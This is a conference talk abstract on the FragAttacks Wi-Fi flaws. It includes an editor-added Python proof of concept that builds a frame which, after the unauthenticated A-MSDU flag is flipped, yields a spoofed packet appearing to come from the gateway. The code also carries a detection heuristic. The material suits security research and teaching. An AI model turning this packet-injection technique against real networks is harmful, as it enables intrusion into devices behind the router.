FragAttacks: Breaking Wi-Fi through Fragmentation and Aggregation

Presented at Black Hat USA 2021, Aug. 5, 2021, 10:20 a.m. (40 minutes).

This presentation introduces three novel security-related design flaws in Wi-Fi and various widespread implementation flaws. An adversary can abuse these to inject packets or exfiltrate selected frames. As an example, it will be demonstrated how packet injection can be used to punch a hole in the router's NAT so the adversary can connect to and exploit internal devices in the network (e.g. BlueKeep against Windows 7).

The first design flaw is present in Wi-Fi's frame aggregation feature, where a flag in the Wi-Fi header is not properly protected: it is not covered by the frame's authentication, so an adversary can flip it without detection. The other two design flaws are present in Wi-Fi's frame fragmentation feature, where the receiver improperly verifies and manages fragments. Although these design flaws can be non-trivial to exploit, they affect all protected Wi-Fi networks. Some design flaws even affect the ancient WEP protocol, meaning these flaws have been part of Wi-Fi since 1997.
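The aggregation flaw is easiest to understand by parsing the same bytes both ways. The unprotected flag is the A-MSDU Present bit in the QoS Control field of the 802.11 header, which the CCMP/GCMP authentication (the AAD) masks out unless the optional SPP A-MSDU capability was negotiated. When the bit is clear, the decrypted payload is one MSDU (an LLC/SNAP header followed by an IP packet); when it is set, the receiver parses the payload as a chain of subframes, each a DA (6 bytes), SA (6 bytes), length (2 bytes) and data padded to 4 bytes. Read as an A-MSDU, the length of the first subframe lands on the outer IPv4 Identification field, which a remote attacker controls, so the attacker can choose where the second, fully attacker-supplied subframe begins. The example below is added here and is this editor's own code, not the presenter's tool; all addresses and packet contents are constructed, the IP checksum is left zero because it does not affect the parsing, and the `first_subframe_looks_like_llc` heuristic is one way a receiver can spot such a flipped frame (an A-MSDU whose first destination address is the RFC 1042 header prefix is almost certainly a normal MSDU with the bit flipped).

```python
"""A-MSDU flag flipping, shown on a constructed frame (added example)."""
import struct

RFC1042_IPV4 = bytes.fromhex("aaaa030000000800")   # LLC/SNAP header, EtherType IPv4


def ip4(addr: str) -> bytes:
    return bytes(int(o) for o in addr.split("."))


def ipv4_header(src: str, dst: str, proto: int, payload_len: int, ident: int) -> bytes:
    # Checksum left as zero: irrelevant for the parsing behaviour shown here.
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + payload_len, ident,
                       0, 64, proto, 0, ip4(src), ip4(dst))


def parse_msdu(payload: bytes) -> dict:
    """Interpretation with the A-MSDU bit clear: LLC/SNAP followed by IPv4."""
    if payload[:8] != RFC1042_IPV4:
        raise ValueError("not an LLC/SNAP IPv4 frame")
    ip = payload[8:]
    ihl = (ip[0] & 0x0F) * 4
    total_len, ident = struct.unpack("!HH", ip[2:6])
    return {
        "src": ".".join(map(str, ip[12:16])),
        "dst": ".".join(map(str, ip[16:20])),
        "id": ident,
        "proto": ip[9],
        "payload": ip[ihl:total_len],
    }


def parse_amsdu(payload: bytes) -> list:
    """Interpretation with the A-MSDU bit set: DA(6) SA(6) Len(2) data, padded to 4."""
    subframes, off = [], 0
    while off + 14 <= len(payload):
        da, sa = payload[off:off + 6], payload[off + 6:off + 12]
        (length,) = struct.unpack("!H", payload[off + 12:off + 14])
        data = payload[off + 14:off + 14 + length]
        if len(data) < length:
            raise ValueError("truncated A-MSDU subframe")
        subframes.append({"da": da, "sa": sa, "data": data})
        off += 14 + length
        off += (-off) % 4            # subframes are padded to a 4-byte boundary
    return subframes


def first_subframe_looks_like_llc(payload: bytes) -> bool:
    """Receiver-side heuristic (this example's own): an A-MSDU whose first DA is the
    RFC 1042 prefix is almost certainly a normal MSDU with its aggregation bit flipped."""
    return payload[:6] == RFC1042_IPV4[:6]


def build_attack_frame() -> bytes:
    """Outer packet the attacker's Internet host sends to the victim (constructed),
    carrying an inner packet that only appears if the payload is parsed as an A-MSDU."""
    inner_udp = struct.pack("!HHHH", 53, 53, 8 + 4, 0) + b"evil"
    # Spoofed inner packet claims to come from the gateway 192.168.1.1 (made-up addresses)
    inner_ip = ipv4_header("192.168.1.1", "192.168.1.20", 17, len(inner_udp), 0) + inner_udp
    # Second A-MSDU subframe: DA, SA, length, then LLC/SNAP + the spoofed packet
    subframe2 = (bytes.fromhex("001122334455") + bytes.fromhex("aabbccddeeff")
                 + struct.pack("!H", 8 + len(inner_ip)) + RFC1042_IPV4 + inner_ip)
    outer_udp = struct.pack("!HHHH", 4444, 5555, 8 + len(subframe2), 0) + subframe2
    # Parsed as an A-MSDU, the first subframe's length field is the outer IP ID.
    # LLC(8)+IP(20)+UDP(8) = 36 bytes precede subframe2 and the first subframe header
    # is 14 bytes, so ID = 22 makes the first subframe end exactly where subframe2 begins.
    outer_ip = ipv4_header("203.0.113.10", "192.168.1.20", 17, len(outer_udp), 22) + outer_udp
    return RFC1042_IPV4 + outer_ip


def demo():
    frame = build_attack_frame()
    normal = parse_msdu(frame)                 # what the victim should see
    subs = parse_amsdu(frame)                  # what it sees after the bit flip
    injected = parse_msdu(subs[1]["data"])     # the attacker-chosen second subframe
    return normal, injected, first_subframe_looks_like_llc(frame)


if __name__ == "__main__":
    normal, injected, flagged = demo()
    print("bit clear:", normal["src"], "->", normal["dst"])
    print("bit set:  ", injected["src"], "->", injected["dst"], injected["payload"])
    print("heuristic flags frame:", flagged)
```

Run as a script: with the bit clear the victim sees a UDP datagram from 203.0.113.10; with the bit set it sees a second subframe that decodes to a packet "from" 192.168.1.1, which the attacker never had to be on the LAN to send. The heuristic flags the frame because its first six bytes are the RFC 1042 prefix; the standards-level fix is to authenticate the flag itself (SPP A-MSDU), which the heuristic only approximates.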

In practice, the implementation vulnerabilities are the most concerning. Several are widespread and trivial to exploit. For example, some devices accept plaintext frames in a protected Wi-Fi network and others accept plaintext aggregated frames that resemble handshake messages. The resulting attacks will be demonstrated, such as turning an IoT power socket on and off, and a tool will be released that can be used to test Wi-Fi products against all the discovered vulnerabilities.

Presenters:

  • Mathy Vanhoef - Postdoctoral Researcher, New York University Abu Dhabi
    Mathy Vanhoef is a postdoctoral researcher at New York University Abu Dhabi. He previously discovered the KRACK attack against WPA2, the RC4 NOMORE attack against RC4, and the Dragonblood attack against WPA3. His research interest lies in computer security with a focus on network and wireless security (e.g. Wi-Fi), software security, and applied cryptography. In these areas, Mathy tries to bridge the gap between real-world code and (protocol) standards.
